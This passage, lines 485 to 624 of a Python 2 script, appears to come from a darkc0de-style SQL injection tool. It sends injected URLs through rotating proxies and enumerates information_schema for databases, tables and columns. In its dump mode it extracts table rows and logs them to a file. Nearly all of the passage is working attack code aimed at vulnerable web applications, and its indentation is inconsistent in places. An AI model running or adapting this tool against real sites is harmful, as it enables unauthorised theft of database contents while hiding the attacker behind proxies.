485.                                                 proxy_num+=1
486.                                                 gets+=1
487.                                                 #print "[!] Column Debug:",table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")
488.                                                 source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")).read()
489.                                                 e = re.findall("darkc0de",source)
490.                                                 if len(e) > 0:
491.                                                         print "[!] Found a column called:",column
492.                                                         file.write("\n[!] Found a column called:"+column)  
493.                                         except (KeyboardInterrupt, SystemExit):
494.                                                 raise
495.                                         except:
496.                                                 pass
497.                                 print "[-] Done searching inside table \""+table+"\" for columns!"
498.                                 file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
499.                 except (KeyboardInterrupt, SystemExit):
500.                         raise
501.                 except:
502.                         pass
503.        
504. #Lets Count how many rows or columns
505. if mode == "--schema" or mode == "--dump" or mode == "--dbs":
506.         source = proxy_list[proxy_num % proxy_len].open(count_URL).read()
507.         match = re.findall("\x1e\x1e\S+",source)
508.         match = match[0][2:].split("\x1e")
509.         row_value = match[0]
510.         print "[+] Number of "+arg_row+": "+row_value
511.         file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
512. if mode == "--schema" or mode == "--full" or mode == "--dbs":
513.         print
514. ##Schema Enumeration and DataExt loop
515. if mode == "--schema" or mode == "--dump" or mode == "--dbs":
516.     while int(table_num) != int(row_value)+1:
517.                 #print "table#:",table_num,"row#:",row_value
518.         try:
519.             proxy_num+=1
520.             gets+=1
521.             #print line_URL
522.             source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
523.             match = re.findall("\x1e\x1e\S+",source)
524.             if len(match) >= 1:
525.                 if mode == "--schema" or mode == "--full":
526.                     match = match[0][2:].split("\x1e")
527.                     if cur_db != match[0]:         
528.                         cur_db = match[0]
529.                         file.write("\n[Database]: "+match[0]+"\n")
530.                         print "[Database]: "+match[0]
531.                         print "[Table: Columns]"
532.                         file.write("[Table: Columns]")
533.                     if cur_table != match[1]:
534.                                                 print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
535.                                                 file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
536.                         cur_table = match[1]
537.                                         table_num = int(table_num) + 1
538.                     else:
539.                                                 sys.stdout.write(",%s" % (match[2]))
540.                                                 file.write(","+match[2])
541.                                                 sys.stdout.flush()
542.                 #Gathering Databases only
543.                         elif mode == "--dbs":
544.                                 match = match[0]
545.                                 file.write("\n["+str(num)+"]"+str(match))
546.                                 print "["+str(num)+"]",match
547.                     table_num = int(table_num) + 1
548.                 #Collect data from tables & columns
549.                 elif mode == "--dump":
550.                                         match = re.findall("\x1e\x1e+[\w\d\?\/\_\:\.\=\s\S\-+]+\x1e\x1e",source)
551.                     match = match[0].strip("\x1e").split("\x1e")
552.                     if arg_verbose == 1:
553.                                                 print "\n["+str(num)+"] ",
554.                                                 file.write("\n["+str(num)+"] ",)
555.                                         else:
556.                                                 print
557.                                                 file.write("\n")
558.                     for ddata in match:
559.                                                 if ddata == "":
560.                                                         ddata = "NoDataInColumn"
561.                                                 sys.stdout.write("%s:" % (ddata))
562.                                                 file.write("%s:" % ddata)
563.                                                 sys.stdout.flush()
564.                                         table_num = int(table_num) + 1
565.             else:
566.                 if mode == "--dump":
567.                                         sys.stdout.write("\n[%s] No data" % (num))
568.                                         file.write("%s:" % ddata)
569.                                         table_num = int(table_num) + 1
570.                                 else:
571.                                         break
572.             num = int(num) + 1
573.         except (KeyboardInterrupt, SystemExit):
574.             raise
575.         except:
576.             pass
577.  
578. #Full SQLi information_schema Enumeration
579. if mode == "--full":
580.         while 1:
581.                 try:                        
582.                         proxy_num+=1
583.                         gets+=1
584.                         source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
585.                         match = re.findall("\x1e\x1e\S+",source)
586.                         if len(match) >= 1:
587.                                 match = match[0][2:].split("\x1e")
588.                                 if cur_db != match[0]:         
589.                                         cur_db = match[0]
590.                                         file.write("\n\n[Database]: "+match[0]+"\n")
591.                                         print "\n\n[Database]: "+match[0]
592.                                         print "[Table: Columns]"
593.                                         file.write("[Table: Columns]")
594.                                         table_num=0
595.                                 if cur_table != match[1]:
596.                                         print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
597.                                         file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
598.                                         cur_table = match[1]
599.                                         table_num = int(table_num) + 1
600.                                 else:
601.                                         sys.stdout.write(",%s" % (match[2]))
602.                                         file.write(","+match[2])
603.                                         sys.stdout.flush()
604.                         else:
605.                                 if num == 0:
606.                                         print "\n[-] No Data Found"
607.                                 break
608.                         num = int(num) + 1
609.                 except (KeyboardInterrupt, SystemExit):
610.                         raise
611.                 except:
612.                         pass
613.  
614. #Lets wrap it up!
615. if mode == "--schema" or mode == "--full" or mode == "--dump":
616.         print ""
617. print "\n[-] %s" % time.strftime("%X")
618. print "[-] Total URL Requests",gets
619. file.write("\n\n[-] [%s]" % time.strftime("%X"))
620. file.write("\n[-] Total URL Requests "+str(gets))
621. print "[-] Done\n"
622. file.write("\n[-] Done\n")
623. print "Don't forget to check", dbt,"\n"
624. file.close()